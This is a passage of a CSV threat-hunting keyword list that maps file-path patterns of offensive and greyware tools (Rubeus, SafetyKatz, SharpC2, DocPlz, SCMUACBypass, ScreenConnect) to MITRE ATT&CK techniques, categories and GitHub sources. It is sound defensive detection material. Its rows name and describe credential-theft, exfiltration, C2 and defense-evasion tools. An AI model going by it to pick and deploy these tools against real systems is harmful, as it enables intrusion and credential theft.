","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\resources\PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*\rpcrt.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*\rpt_win.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*\rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*\runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\RunBOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*\RunOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*\RunOF\bin\*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*\rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*\SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*\samantha.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*\scanACLsResults.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*\scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*\scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*\SCMUACBypass\*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*\ScreenConnect.Client.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\ScreenConnect.ClientService.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\ScreenConnect.ClientSetup.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\ScreenConnect.WindowsBackstageShell.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\ScreenConnect.WindowsClient.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\ScriptSentry.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*\ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*\ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*\ScriptSentry.txt*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*\scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\servers\dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\servers\icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\servers\smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ShadowSpray\*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\SharpAzbelt.csproj*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*\SharpAzbelt.exe*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*\SharpAzbelt.sln*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*\SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*\SharpDomainSpraty\*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 